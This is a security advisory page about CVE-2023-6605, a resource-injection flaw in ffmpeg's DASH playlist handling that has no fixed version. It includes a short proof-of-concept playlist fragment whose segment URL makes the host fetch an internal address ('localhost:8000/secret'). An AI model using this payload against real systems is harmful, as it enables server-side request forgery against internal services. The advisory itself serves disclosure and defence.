Resource Injection Affecting ffmpeg package, versions [0,]


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-UNMANAGED-FFMPEG-8602536
  • published7 Jan 2025
  • disclosed6 Jan 2025
  • creditUnknown

Introduced: 6 Jan 2025

NewCVE-2023-6605  (opens in a new tab)
CWE-99  (opens in a new tab)

How to fix?

There is no fixed version for ffmpeg.

Overview

Affected versions of this package are vulnerable to Resource Injection via a crafted DASH playlist containing malicious URLs. An attacker can make arbitrary HTTP GET requests on behalf of the machine running the software by supplying a malicious URL in the playlist.

PoC

  <Period duration="PT1S">
    <BaseURL></BaseURL>
    <AdaptationSet contentType="video" lang="en">
      <Representation id="video">
        <SegmentList>
          <SegmentURL media="http://localhost:8000/secret"/>
        </SegmentList>
      </Representation>
    </AdaptationSet>
  </Period>
</MPD>

CVSS Scores

version 4.0
version 3.1